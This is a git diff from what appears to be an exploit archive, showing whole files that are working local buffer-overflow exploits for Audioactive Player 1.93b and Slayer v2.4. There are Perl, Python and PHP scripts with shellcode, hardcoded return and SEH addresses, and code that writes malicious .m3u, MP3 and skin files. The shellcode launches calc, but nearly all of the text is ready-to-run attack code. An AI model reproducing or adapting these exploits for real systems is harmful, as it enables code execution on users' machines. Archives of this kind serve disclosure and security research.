-"\xad\x98\x54\x52\xc8\x9d\x1f\xca\x8a\x28\x1f\x27\x21\x6d\x15\x5e".
-"\x27\x6e\x34\xa7\x1d\xf8\xfb\x57\x53\x49\x54\x0c\x02\xad\x34\x35".
-"\xad\xa0\x94\xd8\x79\xb0\xde\xb8\xad\xb0\x54\x52\xcd\x25\x83\x77".
-"\x22\x6f\xee\x93\x42\x27\x9f\x63\xa3\x6c\xa7\x5f\xad\xec\xd3\xd8".
-"\x56\xb0\x72\xd8\x4e\xa4\x34\x5a\xad\x2c\x6f\x53\x26\xac\x54\x3b".
-"\x1a\xf3\xee\xa5\x46\xfa\x56\xab\xa5\x6c\xa4\x03\x4e\x5c\x55\x57".
-"\x79\xc4\x47\xad\xac\xa2\x88\xac\xc1\xcf\xbe\x3f\x45\xac\xdf\x53";
-##################################################################
-open(myfile,'>>hack4love.m3u');
-print myfile $bof.$ret.$nop.$shellcode;
-# Tested on: Windows XP Pro SP2 (EN)
-##################################################################
-
-# milw0rm.com [2009-05-15]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# Audioactive player v1.93b (.m3u) Local buffer Overflow Exploit
+# Greetz to all my friends
+# From EGYPT
+##################################################################
+my $bof="\x41" x 224;
+my $ret="\xed\x1e\x94\x7c"; # JMP ESP ntdll.dll
+my $nop="\x90" x 24;
+##################################################################
+# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $shellcode =
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
+"\xac\xdf\x53\x83\xeb\xfc\xe2\xf4\xda\x44\x9b\x53\x26\xac\x54\x16".
+"\x1a\x27\xa3\x56\x5e\xad\x30\xd8\x69\xb4\x54\x0c\x06\xad\x34\x1a".
+"\xad\x98\x54\x52\xc8\x9d\x1f\xca\x8a\x28\x1f\x27\x21\x6d\x15\x5e".
+"\x27\x6e\x34\xa7\x1d\xf8\xfb\x57\x53\x49\x54\x0c\x02\xad\x34\x35".
+"\xad\xa0\x94\xd8\x79\xb0\xde\xb8\xad\xb0\x54\x52\xcd\x25\x83\x77".
+"\x22\x6f\xee\x93\x42\x27\x9f\x63\xa3\x6c\xa7\x5f\xad\xec\xd3\xd8".
+"\x56\xb0\x72\xd8\x4e\xa4\x34\x5a\xad\x2c\x6f\x53\x26\xac\x54\x3b".
+"\x1a\xf3\xee\xa5\x46\xfa\x56\xab\xa5\x6c\xa4\x03\x4e\x5c\x55\x57".
+"\x79\xc4\x47\xad\xac\xa2\x88\xac\xc1\xcf\xbe\x3f\x45\xac\xdf\x53";
+##################################################################
+open(myfile,'>>hack4love.m3u');
+print myfile $bof.$ret.$nop.$shellcode;
+# Tested on: Windows XP Pro SP2 (EN)
+##################################################################
+
+# milw0rm.com [2009-05-15]
diff --git a/platforms/windows/local/8701.py b/platforms/windows/local/8701.py
index 26ac8275b..2a4a5dfc7 100755
--- a/platforms/windows/local/8701.py
+++ b/platforms/windows/local/8701.py 
@@ -1,41 +1,41 @@ -#usage: exploit.py -#Open the program then double clic in the exploit file -print "**************************************************************************" -print " Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)\n" -print " Credits : hack4love\n" -print " Seh Exploit: His0k4\n" -print " Tested on: Windows XP Pro SP3 (EN)\n" -print " Greetings to:" -print " All friends & muslims HaCkers(dz),snakespc.com\n" -print "**************************************************************************" - -# win32_exec - EXITFUNC=seh CMD=calc Size=165 Encoder=JmpCallAdditive http://metasploit.com -shellcode=( -"\xfc\xbb\x5d\x53\x65\x97\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85" -"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xa1\xbb\x21\x97\x59\x3c\x21" -"\xd2\x65\xb7\x49\xd8\xed\xc6\x5e\x69\x42\xd1\x2b\x31\x7c\xe0\xc0" -"\x87\xf7\xd6\x9d\x19\xe9\x26\x62\x80\x59\xcc\xa2\xc7\xa6\x0c\xe8" -"\x25\xa9\x4c\x06\xc1\x92\x04\xfd\x2e\x91\x41\x76\x71\x7d\x8b\x62" -"\xe8\xf6\x87\x3f\x7e\x57\x84\xbe\x6b\xec\xa8\x4b\x6a\x19\x59\x17" -"\x49\xd9\x99\x99\x51\x85\x96\x9a\x61\xc0\x69\x62\x8e\x41\x29\x9f" -"\x05\x25\xb6\x32\x92\xad\xce\xa7\xac\xa6\x4f\x87\xaf\xb8\x4f\x63" -"\xc7\x84\x10\x42\xee\x94\xf8\x2d\xf6\xd7\xc5\x55\x57\xbf\x35\x23" -"\x53\x60\xde\xac\xa2\x14\x10\x9a\xa5\xcf\x4e\x45\x36\x6c\x91\x85" -"\xc6\x72\x91\x85\xc6") - -payload = "\x41"*(589-len(shellcode)) -payload += shellcode -payload += "\xE9\x56\xFF\xFF\xFF" # go back -payload += "\x74\xF9\xFF\xFF" #go back -payload += "\xDE\x19\xD1\x72" # Friendly p/p/r msacm32.drv -payload += "\x44"*900 - -try: - out_file = open("exploit.m3u",'w') - out_file.write("http://www.google.com/"+payload+".mp3\r\n") - out_file.close() - raw_input("\nExploit file created!\n") -except: - print "Error" - -# milw0rm.com [2009-05-15] +#usage: exploit.py +#Open the program then double clic in the exploit file +print "**************************************************************************" +print " Audioactive Player 1.93b 
(.m3u) Local Buffer Overflow Exploit (SEH)\n" +print " Credits : hack4love\n" +print " Seh Exploit: His0k4\n" +print " Tested on: Windows XP Pro SP3 (EN)\n" +print " Greetings to:" +print " All friends & muslims HaCkers(dz),snakespc.com\n" +print "**************************************************************************" + +# win32_exec - EXITFUNC=seh CMD=calc Size=165 Encoder=JmpCallAdditive http://metasploit.com +shellcode=( +"\xfc\xbb\x5d\x53\x65\x97\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85" +"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xa1\xbb\x21\x97\x59\x3c\x21" +"\xd2\x65\xb7\x49\xd8\xed\xc6\x5e\x69\x42\xd1\x2b\x31\x7c\xe0\xc0" +"\x87\xf7\xd6\x9d\x19\xe9\x26\x62\x80\x59\xcc\xa2\xc7\xa6\x0c\xe8" +"\x25\xa9\x4c\x06\xc1\x92\x04\xfd\x2e\x91\x41\x76\x71\x7d\x8b\x62" +"\xe8\xf6\x87\x3f\x7e\x57\x84\xbe\x6b\xec\xa8\x4b\x6a\x19\x59\x17" +"\x49\xd9\x99\x99\x51\x85\x96\x9a\x61\xc0\x69\x62\x8e\x41\x29\x9f" +"\x05\x25\xb6\x32\x92\xad\xce\xa7\xac\xa6\x4f\x87\xaf\xb8\x4f\x63" +"\xc7\x84\x10\x42\xee\x94\xf8\x2d\xf6\xd7\xc5\x55\x57\xbf\x35\x23" +"\x53\x60\xde\xac\xa2\x14\x10\x9a\xa5\xcf\x4e\x45\x36\x6c\x91\x85" +"\xc6\x72\x91\x85\xc6") + +payload = "\x41"*(589-len(shellcode)) +payload += shellcode +payload += "\xE9\x56\xFF\xFF\xFF" # go back +payload += "\x74\xF9\xFF\xFF" #go back +payload += "\xDE\x19\xD1\x72" # Friendly p/p/r msacm32.drv +payload += "\x44"*900 + +try: + out_file = open("exploit.m3u",'w') + out_file.write("http://www.google.com/"+payload+".mp3\r\n") + out_file.close() + raw_input("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-05-15] diff --git a/platforms/windows/local/8780.php b/platforms/windows/local/8780.php index 9ae9fec3d..d3c3afd91 100755 --- a/platforms/windows/local/8780.php +++ b/platforms/windows/local/8780.php 
@@ -1,120 +1,120 @@ - "cli") - { - die("[!] Launch from the cli!"); - } - - $____scode = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53". "\xbb\x0d\x25\x86\x7c". //WinExec, 0x7c86250d - "\xff\xd3\x31\xc0\x50". "\xbb\x12\xcb\x81\x7c". //ExitProcess, 0x7c81cb12 - "\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65". "\x78\x65\x20\x2f\x63\x20". "cmd /c calc && ". "\xff"; - - if (strlen($____scode) > 118) - { - die("[!] Shellcode too large here!"); - } - $____BOOM = "\x49\x44\x33\x03\x00\x00\x00\x00\x07\x7b\x54\x49\x54\x32\x00\x00\x03\xbe\x00\x00\x00". str_repeat("\x90", 0x7c).//nop, very reusable - "\xeb\x06\x90\x90". //jmp short - - //"\x01\x01\x06\x01". //less usually in this location... - "\x01\x01\x05\x01". //eax - ecx, this works 80% of the times - "\x90\x90\x90\x90". //nop - $____scode. str_repeat("A", 0x01f0 - strlen($____scode)). "\x54\x41\x4c\x42\x00\x00\x00\x02\x00\x00\x00\x31\x54\x59\x45\x52\x00\x00\x00\x05\x00\x00\x00\x31\x39\x35\x30\x54\x43\x4f". "\x4e\x00\x00\x00\x02\x00\x00\x00\x31\x54\x43\x4f\x50\x00\x00\x00\x02\x00\x00\x00\x31\xff\xfb\x90\x64\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x6e\x66\x6f\x00\x00\x00". "\x0f\x00\x00\x04\x7e\x00\x07\x57\x2e\x00\x02\x05\x08\x0a\x0d\x10\x12\x14\x17\x19\x1c\x1f\x21\x24\x27\x28\x2b\x2e\x30\x33\x36\x38". "\x3b\x3d\x40\x42\x45\x48\x4a\x4d\x4f\x51\x54\x57\x59\x5c\x5f\x61\x63\x66\x69\x6b\x6e\x71\x73\x76\x78\x7a\x7d\x80\x82\x85\x88\x8a". "\x8c\x8f\x92\x94\x97\x9a\x9c\x9e\xa1\xa3\xa6\xa9\xab\xae\xb1\xb2\xb5\xb8\xba\xbd\xc0\xc3\xc4\xc7\xca\xcc\xcf\xd2\xd4\xd7\xd9\xdb". "\xde\xe1\xe3\xe6\xe9\xeb\xed\xf0\xf3\xf5\xf8\xfb\xfd\x00\x00\x00\x37\x4c\x41\x4d\x45\x33\x2e\x39\x38\x20\x01\xaa\x00\x00\x00\x00". "\x00\x00\x00\x00\x14\x80\x24\x04\xc7\x4e\x00\x00\x80\x00\x07\x57\x2e\x4f\x7b\xf5\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfb\x90\x64\x00\x09\xf3\x50\x68\xbc". "\xb0\x42\x83\x72\x00\x00\x0d\x20\x00\x00\x01\x14\x35\xa8\xf0\x04\x3e\x8d\xc8\x00\x00\x34\x80\x00\x00\x04\x00\x20\xc0\x01\xf2\x67". "\x21\x27\x0e\x60\x05\x16\x77\x3c\x84\x69\xc8\xdf\xff\xff\xf3\x9d\xe4\x21\x18\xe0\x00\x04\x65\xa6\x9a\x74\xcb\xe5\xf2\x7d\x22\x18". "\x18\xd0\x58\x43\x15\x8a\x50\xd4\x73\xc9\xf2\xfb\xa0\x82\x09\xbd\x48\x20\x85\x68\x20\x85\x34\xd3\xa9\x37\x41\x66\xea\x41\xbf\xab". "\x41\x04\x2b\x4d\x37\xa6\x9b\xd0\x41\x0d\x06\xff\xff\xff\xad\x34\xd2\x20\x06\xa4\xd9\xbb\xad\x34\xd3\xd0\x41\xaa\x41\xb5\xff\xd3". "\x48\xdd\x46\x0f\xf6\x8b\xd4\x95\x75\x15\x24\x60\x4c\x3f\xc8\x95\x53\x6c\x09\x23\x5b\x55\xae\xbd\x73\xaf\xbc\x7c\xfd\xeb\x3f\x5f". "\x74\x92\x29\x7f\x2e\x71\xa2\x67\x78\xc7\xdd\xbd\xeb\x5a\xef\x35\x7a\x8b\x4b\xc4\xd1\x74\xd5\x44\x08\x59\xc2\x52\x10\x18\x03\x65". "\x80\xe2\x81\x85\x43\xb2\x5d\x26\x88\xb1\x16\x27\x92\x5a\x46\xc6\x49\x3d\x13\x13\x54\x98\xc4\xc4\xd5\x92\x32\x76\x3e\x4d\x0b\x34". "\x6b\x1b\xa6\x79\x16\x5d\x9d\x2a\xd1\x4a\x89\x89\xab\x24\x64\x93\x4c\x8c\x9d\xcf\x14\x46\x5c\x64\x0e\xb9\xe5\xba\xb7\xd7\xba\xaa". 
"\xba\x96\xb6\xa4\x75\x48\x13\xc1\xf1\x05\x04\x97\x12\x27\x8c\x51\x64\x8b\xc9\x3d\x13\x24\x9d\x91\x47\x75\xd4\xee\xc8\xb9\x18\x62". "\x28\xe5\xa2\xeb\xca\xb2\x7b\x9b\xcb\x17\x77\x57\x84\x20\x04\x09\x49\x4a\x87\xb2\x30\x2b\x22\x52\x9f\x1a\xa7\xfa\xce\xfd\xef\x47". "\x94\xa3\xc8\x90\x1e\x66\x25\x91\xa3\xd4\xe2\xc7\x1f\x3b\x7f\x1e\xf7\xbc\x37\xef\xe3\xd3\x3e\x9a\x65\xf3\x76\x93\x65\xf2\xf8\xe5". "\x86\x47\x04\xf2\x81\xb6\x00\x16\x6c\x65\x4a\xef\x74\x10\x41\x37\x6a\x08\x20\x60\x68\x99\x9a\x69\x9b\xbd\x35\x1c\x27\x0c\x48\x99". "\x38\x4e\x13\x64\xfb\xa1\x98\x17\x10\x41\x74\xd3\x4d\x34\x19\x6b\x2f\x9a\x54\x82\x88\xa1\x38\xff\xfb\x92\x64\x38\x8d\xf5\x62\x6a". "\xbb\x81\x0f\xa3\x72\x00\x00\x0d\x20\x00\x00\x01\x0e\x71\x6a\xf2\x21\x8e\x0d\xc8\x00\x00\x34\x80\x00\x00\x04\x66\x1d\x51\x49\x92". "\x44\x50\xd0\xc0\xd1\x03\x03\x43\x74\xd3\xad\xf5\x3a\xb4\x18\xc0\xb8\x79\x33\x33\x83\x5c\x2c\x18\x2c\x64\xb8\xb2\xf9\x99\x7d\x34". "\xd4\x87\x41\x69\xd4\x60\x68\xd4\xd6\x66\x6f\x98\x11\x03\xa2\xe5\x36\x4c\xa0\x79\x34\xe5\xdd\xaa\xfb\x36\xca\x14\x04\x04\x04\x98"; - $____x = 0x35; - $____v = (strlen($_SERVER["USERPROFILE"]) % 4); - $____x = $____x - $____v; - //addresses that worked for me... - //$____pad = str_repeat("\x73\xb2\x42\x77",$____x); //0x7742b27f COMCTL32.DLL->0x10003dcc call edi, JetCFG.dll - //$____pad = str_repeat("\xe9\x62\xe0\x77",$____x); //0x77e062f5 RPCRT4.DLL->0x7d03388b call edi, SHELL32.DLL - //$____pad = str_repeat("\x23\xa2\xae\x76",$____x); //0x76aea22f ATL.DLL->0x10003dcc call edi, JetCFG.dll - $____pad = str_repeat("\xf3\xa5\xc0\x77", $____x); //0x77c0a5ff MSVCRT.DLL->0x10003dcc call edi, JetCFG.dll, best one - for ($i = 0; $i < 4; $i++) - { - $____junk = str_repeat("_", $i); - $____fname = "_9sg__mzk_".$____junk.$____pad.".MP3"; - $____path = $_SERVER["USERPROFILE"]."\\Desktop\\".$____fname; - $____x = fopen($____path, "w+"); - if (!$____x) - { - die("[!] Unable to create ".$____path." 
..."); - } - fputs ($____x, $____BOOM); - fclose($____x); - print("[*] ".$____path." created!\n"); - if ($i == $____v) - { - print("[?] This will hit the right offset on your system! Do you like my composition?\n"); - } - } -?> - -# milw0rm.com [2009-05-26] + "cli") + { + die("[!] Launch from the cli!"); + } + + $____scode = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53". "\xbb\x0d\x25\x86\x7c". //WinExec, 0x7c86250d + "\xff\xd3\x31\xc0\x50". "\xbb\x12\xcb\x81\x7c". //ExitProcess, 0x7c81cb12 + "\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65". "\x78\x65\x20\x2f\x63\x20". "cmd /c calc && ". "\xff"; + + if (strlen($____scode) > 118) + { + die("[!] Shellcode too large here!"); + } + $____BOOM = "\x49\x44\x33\x03\x00\x00\x00\x00\x07\x7b\x54\x49\x54\x32\x00\x00\x03\xbe\x00\x00\x00". str_repeat("\x90", 0x7c).//nop, very reusable + "\xeb\x06\x90\x90". //jmp short + + //"\x01\x01\x06\x01". //less usually in this location... + "\x01\x01\x05\x01". //eax - ecx, this works 80% of the times + "\x90\x90\x90\x90". //nop + $____scode. str_repeat("A", 0x01f0 - strlen($____scode)). "\x54\x41\x4c\x42\x00\x00\x00\x02\x00\x00\x00\x31\x54\x59\x45\x52\x00\x00\x00\x05\x00\x00\x00\x31\x39\x35\x30\x54\x43\x4f". "\x4e\x00\x00\x00\x02\x00\x00\x00\x31\x54\x43\x4f\x50\x00\x00\x00\x02\x00\x00\x00\x31\xff\xfb\x90\x64\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x6e\x66\x6f\x00\x00\x00". "\x0f\x00\x00\x04\x7e\x00\x07\x57\x2e\x00\x02\x05\x08\x0a\x0d\x10\x12\x14\x17\x19\x1c\x1f\x21\x24\x27\x28\x2b\x2e\x30\x33\x36\x38". "\x3b\x3d\x40\x42\x45\x48\x4a\x4d\x4f\x51\x54\x57\x59\x5c\x5f\x61\x63\x66\x69\x6b\x6e\x71\x73\x76\x78\x7a\x7d\x80\x82\x85\x88\x8a". "\x8c\x8f\x92\x94\x97\x9a\x9c\x9e\xa1\xa3\xa6\xa9\xab\xae\xb1\xb2\xb5\xb8\xba\xbd\xc0\xc3\xc4\xc7\xca\xcc\xcf\xd2\xd4\xd7\xd9\xdb". 
"\xde\xe1\xe3\xe6\xe9\xeb\xed\xf0\xf3\xf5\xf8\xfb\xfd\x00\x00\x00\x37\x4c\x41\x4d\x45\x33\x2e\x39\x38\x20\x01\xaa\x00\x00\x00\x00". "\x00\x00\x00\x00\x14\x80\x24\x04\xc7\x4e\x00\x00\x80\x00\x07\x57\x2e\x4f\x7b\xf5\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfb\x90\x64\x00\x09\xf3\x50\x68\xbc". "\xb0\x42\x83\x72\x00\x00\x0d\x20\x00\x00\x01\x14\x35\xa8\xf0\x04\x3e\x8d\xc8\x00\x00\x34\x80\x00\x00\x04\x00\x20\xc0\x01\xf2\x67". "\x21\x27\x0e\x60\x05\x16\x77\x3c\x84\x69\xc8\xdf\xff\xff\xf3\x9d\xe4\x21\x18\xe0\x00\x04\x65\xa6\x9a\x74\xcb\xe5\xf2\x7d\x22\x18". "\x18\xd0\x58\x43\x15\x8a\x50\xd4\x73\xc9\xf2\xfb\xa0\x82\x09\xbd\x48\x20\x85\x68\x20\x85\x34\xd3\xa9\x37\x41\x66\xea\x41\xbf\xab". "\x41\x04\x2b\x4d\x37\xa6\x9b\xd0\x41\x0d\x06\xff\xff\xff\xad\x34\xd2\x20\x06\xa4\xd9\xbb\xad\x34\xd3\xd0\x41\xaa\x41\xb5\xff\xd3". "\x48\xdd\x46\x0f\xf6\x8b\xd4\x95\x75\x15\x24\x60\x4c\x3f\xc8\x95\x53\x6c\x09\x23\x5b\x55\xae\xbd\x73\xaf\xbc\x7c\xfd\xeb\x3f\x5f". "\x74\x92\x29\x7f\x2e\x71\xa2\x67\x78\xc7\xdd\xbd\xeb\x5a\xef\x35\x7a\x8b\x4b\xc4\xd1\x74\xd5\x44\x08\x59\xc2\x52\x10\x18\x03\x65". 
"\x80\xe2\x81\x85\x43\xb2\x5d\x26\x88\xb1\x16\x27\x92\x5a\x46\xc6\x49\x3d\x13\x13\x54\x98\xc4\xc4\xd5\x92\x32\x76\x3e\x4d\x0b\x34". "\x6b\x1b\xa6\x79\x16\x5d\x9d\x2a\xd1\x4a\x89\x89\xab\x24\x64\x93\x4c\x8c\x9d\xcf\x14\x46\x5c\x64\x0e\xb9\xe5\xba\xb7\xd7\xba\xaa". "\xba\x96\xb6\xa4\x75\x48\x13\xc1\xf1\x05\x04\x97\x12\x27\x8c\x51\x64\x8b\xc9\x3d\x13\x24\x9d\x91\x47\x75\xd4\xee\xc8\xb9\x18\x62". "\x28\xe5\xa2\xeb\xca\xb2\x7b\x9b\xcb\x17\x77\x57\x84\x20\x04\x09\x49\x4a\x87\xb2\x30\x2b\x22\x52\x9f\x1a\xa7\xfa\xce\xfd\xef\x47". "\x94\xa3\xc8\x90\x1e\x66\x25\x91\xa3\xd4\xe2\xc7\x1f\x3b\x7f\x1e\xf7\xbc\x37\xef\xe3\xd3\x3e\x9a\x65\xf3\x76\x93\x65\xf2\xf8\xe5". "\x86\x47\x04\xf2\x81\xb6\x00\x16\x6c\x65\x4a\xef\x74\x10\x41\x37\x6a\x08\x20\x60\x68\x99\x9a\x69\x9b\xbd\x35\x1c\x27\x0c\x48\x99". "\x38\x4e\x13\x64\xfb\xa1\x98\x17\x10\x41\x74\xd3\x4d\x34\x19\x6b\x2f\x9a\x54\x82\x88\xa1\x38\xff\xfb\x92\x64\x38\x8d\xf5\x62\x6a". "\xbb\x81\x0f\xa3\x72\x00\x00\x0d\x20\x00\x00\x01\x0e\x71\x6a\xf2\x21\x8e\x0d\xc8\x00\x00\x34\x80\x00\x00\x04\x66\x1d\x51\x49\x92". "\x44\x50\xd0\xc0\xd1\x03\x03\x43\x74\xd3\xad\xf5\x3a\xb4\x18\xc0\xb8\x79\x33\x33\x83\x5c\x2c\x18\x2c\x64\xb8\xb2\xf9\x99\x7d\x34". "\xd4\x87\x41\x69\xd4\x60\x68\xd4\xd6\x66\x6f\x98\x11\x03\xa2\xe5\x36\x4c\xa0\x79\x34\xe5\xdd\xaa\xfb\x36\xca\x14\x04\x04\x04\x98"; + $____x = 0x35; + $____v = (strlen($_SERVER["USERPROFILE"]) % 4); + $____x = $____x - $____v; + //addresses that worked for me... 
+ //$____pad = str_repeat("\x73\xb2\x42\x77",$____x); //0x7742b27f COMCTL32.DLL->0x10003dcc call edi, JetCFG.dll + //$____pad = str_repeat("\xe9\x62\xe0\x77",$____x); //0x77e062f5 RPCRT4.DLL->0x7d03388b call edi, SHELL32.DLL + //$____pad = str_repeat("\x23\xa2\xae\x76",$____x); //0x76aea22f ATL.DLL->0x10003dcc call edi, JetCFG.dll + $____pad = str_repeat("\xf3\xa5\xc0\x77", $____x); //0x77c0a5ff MSVCRT.DLL->0x10003dcc call edi, JetCFG.dll, best one + for ($i = 0; $i < 4; $i++) + { + $____junk = str_repeat("_", $i); + $____fname = "_9sg__mzk_".$____junk.$____pad.".MP3"; + $____path = $_SERVER["USERPROFILE"]."\\Desktop\\".$____fname; + $____x = fopen($____path, "w+"); + if (!$____x) + { + die("[!] Unable to create ".$____path." ..."); + } + fputs ($____x, $____BOOM); + fclose($____x); + print("[*] ".$____path." created!\n"); + if ($i == $____v) + { + print("[?] This will hit the right offset on your system! Do you like my composition?\n"); + } + } +?> + +# milw0rm.com [2009-05-26] diff --git a/platforms/windows/local/8789.py b/platforms/windows/local/8789.py index ea1ac6873..a2fddac32 100755 --- a/platforms/windows/local/8789.py +++ b/platforms/windows/local/8789.py 
@@ -1,94 +1,94 @@ -#!/usr/bin/python -print "**************************************************************************" -print "[~]Slayer v2.4 (skin) Universal Seh Overflow Exploit (SEH)\n" -print "[~]AUTHOR: SuNHouSe2 [ALGERIAN HaCkEr]\n" -print "[~]Email : sunhouse2@yahoo.com\n" -print "[~]HOME : http://www.snakespc.com\n" -print "[~]Tested on: Windows XP Pro SP3 (FR)\n" -print "[~]Special ThanX : His0k4,& ALL Snakespc.com Members\n" -print "**************************************************************************" - -import os - -header1=( -"\x5b\x53\x43\x52\x45\x45\x4e\x5d\x0a\x4d\x61\x73\x6b\x3d\x2e\x2e\x2f\x61\x62\x64" -"\x2f\x6d\x61\x73\x6b\x2e\x62\x6d\x70\x0a\x4d\x61\x69\x6e\x3d\x2e\x2e\x2f\x61\x62" -"\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70\x67\x0a\x44\x6f\x77\x6e\x3d\x2e\x2e\x2f\x61" -"\x62\x64\x2f\x53\x65\x6c\x65\x63\x74\x65\x64\x2e\x6a\x70\x67\x0a\x4f\x76\x65\x72" -"\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x4f\x76\x65\x72\x2e\x6a\x70\x67\x0a\x44\x69\x73" -"\x61\x62\x6c\x65\x64\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70" -"\x67\x0a\x0a\x5b\x42\x55\x54\x54\x4f\x4e\x49\x4e\x46\x4f\x5d\x0a\x31\x3d") - -header2=( -"\x2c\x33\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x43\x6f\x6e\x66\x69\x67" -"\x75\x72\x61\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x32\x3d\x42\x5f\x56\x4f" -"\x42\x2c\x32\x39\x2c\x33\x31\x2c\x31\x34\x2c\x31\x35\x2c\x4c\x61\x6e\x67\x75\x61" -"\x67\x65\x20\x53\x65\x6c\x65\x63\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x33" -"\x3d\x42\x5f\x50\x4c\x41\x59\x4c\x49\x53\x54\x2c\x37\x30\x2c\x34\x39\x2c\x31\x34" -"\x2c\x31\x35\x2c\x50\x6c\x61\x79\x6c\x69\x73\x74\x2c\x46\x41\x4c\x53\x45\x0a\x34" -"\x3d\x42\x5f\x4d\x55\x54\x45\x2c\x36\x34\x2c\x37\x35\x2c\x31\x34\x2c\x31\x35\x2c" -"\x4d\x75\x74\x65\x2c\x46\x41\x4c\x53\x45\x0a\x35\x3d\x42\x5f\x46\x55\x4c\x4c\x53" -"\x43\x52\x45\x45\x4e\x2c\x37\x32\x2c\x32\x36\x2c\x31\x34\x2c\x31\x35\x2c\x46\x75" -"\x6c\x6c\x73\x63\x72\x65\x65\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x36\x3d\x42\x5f\x41" 
-"\x42\x4f\x55\x54\x2c\x33\x34\x2c\x38\x36\x2c\x31\x33\x2c\x31\x33\x2c\x41\x62\x6f" -"\x75\x74\x2c\x46\x41\x4c\x53\x45\x0a\x37\x3d\x42\x5f\x4f\x50\x45\x4e\x2c\x32\x39" -"\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x4f\x70\x65\x6e\x2c\x46\x41\x4c\x53" -"\x45\x0a\x38\x3d\x42\x5f\x43\x4c\x4f\x53\x45\x2c\x34\x32\x33\x2c\x35\x2c\x31\x32" -"\x2c\x31\x30\x2c\x43\x6c\x6f\x73\x65\x2c\x46\x41\x4c\x53\x45\x0a\x39\x3d\x42\x5f" -"\x50\x52\x45\x56\x2c\x32\x34\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x72" -"\x65\x76\x69\x6f\x75\x73\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x30" -"\x3d\x42\x5f\x4e\x45\x58\x54\x2c\x32\x37\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36" -"\x2c\x4e\x65\x78\x74\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x31\x3d" 